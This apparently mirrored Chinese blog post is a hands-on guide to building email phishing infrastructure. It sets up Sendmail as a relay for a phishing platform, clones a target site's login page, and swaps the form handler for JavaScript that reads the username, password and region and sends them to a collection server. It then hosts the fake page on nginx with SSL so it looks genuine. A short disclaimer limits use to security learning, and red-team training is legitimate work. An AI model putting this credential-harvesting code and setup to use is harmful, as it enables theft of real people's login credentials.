2

关于邮件钓鱼的哪些事(二)

 3 years ago
source link: https://www.ascotbe.com/2021/08/17/Office_0x02/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

首先需要编写一个钓鱼一键化平台,然后进入我们的正题

搭建邮件服务器

首先卸载Postfix

如果没有Postfix就跳过

sudo systemctl stop postfix
sudo apt remove postfix && apt purge postfix

安装Sendmail

sudo apt install sendmail

配置Sendmail服务器

sudo sendmailconfig

接收输入电子邮件

编辑/etc/mail/sendmail.mc

DAEMON_OPTIONS(`Family=inet,  Name=MTA-v4, Port=smtp, Addr=127.0.0.1')dnl
DAEMON_OPTIONS(`Family=inet, Name=MSP-v4, Port=submission, M=Ea, Addr=127.0.0.1')dnl

#找到上面这两行修改为
DAEMON_OPTIONS(`Family=inet, Name=MTA-v4, Port=smtp, Addr=0.0.0.0')dnl
dnl DAEMON_OPTIONS(`Family=inet, Name=MSP-v4, Port=submission, M=Ea, Addr=127.0.0.1')dnl

然后将域名添加到/etc/mail/local-host-names文件中

ascotbe.com
mail.ascotbe.com
localhost
localhost.localdomain

现在使用 m4宏处理器来编译Sendmail配置文件。m4是基于流的。

sudo m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf

重新启动Sendmail服务

sudo systemctl restart sendmail

里面有一些报错,比方说为什么发送失败等等

/var/log/mail.log

多服务方案

如果你的Medusa在一个服务器,而邮件服务器又在一个地方,需要修改邮件服务中的配置,打开/etc/mail/access文件

#添加全局配置
202.222 RELAY
#或者添加单IP发送配置,这个IP为你Medusa的服务器IP
192.111.111.111 RELAY

配置完需要重启服务器

配置域名解析

![image-20210818111703403](/Users/ascotbe/Library/Application Support/typora-user-images/image-20210818111703403.png)

编写钓鱼页面

一般把目标网站copy到本地,然后把页面中的/test/login.html进行补全http://127.0.0.1/test/login.html,具体看网页去,然后修改action标签

javascript
<form action="javascript:login()">

一般是这样的,我们只需要把函数进行修改或者自定义,替换成下面函数

不同的网页不同的改法,我这边只是做个样例

javascript
var login2 = function () {
var username = $("#username").val()
var password = $("#password").val()
var region = $("#region").val()
if (username.length == 0 || password.length == 0 || region.length == 0) {
//alert('你东西没填是吧')
console.log('空')
return false
}
console.log(username.length == 0)
$.get('http://127.0.0.1:9999/b/sasdasdasd/?', {
username: username,
password: password,
region: region
}, function (data) {
window.location.href = 'http://ascotbe.com'
console.log(data);
});}

可以使用kali或者Ubuntu进行下载,然后进行网站克隆,一般不太会用到,做个记录

sudo apt install httrack

钓鱼网站搭建

安装nginx

apt-get install nginx

查看安装版本

nginx -v

启动nginx

service nginx start

然后输入服务器IP就能看到下面效果

![image-20210817160653634](/Users/ascotbe/Library/Application Support/typora-user-images/image-20210817160653634.png)

配置钓鱼页面

进入nginx默认的网页目录

cd /var/www/html

你会看到index.html、index.htm、index.nginx-debian.html三个文件中的任意一个(建议全部删了)然后把你改好的钓鱼页面放到上面

![image-20210817161251555](/Users/ascotbe/Library/Application Support/typora-user-images/image-20210817161251555.png)修改nginx的配置文件

sudo vim /etc/nginx/sites-enabled/default

![image-20210817160440321](/Users/ascotbe/Library/Application Support/typora-user-images/image-20210817160440321.png)

接着重启服务

sudo systemctl restart nginx

可以看到已经成功的页面

![image-20210817163600907](/Users/ascotbe/Library/Application Support/typora-user-images/image-20210817163600907.png)

配置SSL证书,还是对/etc/nginx/sites-enabled/default文件进行修改

server {
# 服务器端口使用443,开启ssl, 这里ssl就是上面安装的ssl模块
listen 443 ssl;
#填写绑定证书的域名
server_name ascotbe.com;

# ssl证书地址
ssl_certificate /etc/nginx/cert/ssl.crt; #证书文件名称
ssl_certificate_key /etc/nginx/cert/ssl.key; # 私钥文件名称

# ssl验证相关配置
ssl_session_timeout 5m; #缓存有效期
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4; #加密算法
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; #安全链接可选的加密协议
ssl_prefer_server_ciphers on; #使用服务器端的首选算法

location / {
#网站主页路径。此路径仅供参考,具体请您按照实际目录操作
root /var/www/html;
index logon.html;
}
}
server {
listen 80;
server_name ascotbe.com;
return 301 https://$server_name$request_uri;
}

最好重启Nginx即可看到结果

![image-20210817184011177](/Users/ascotbe/Library/Application Support/typora-user-images/image-20210817184011177.png)


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK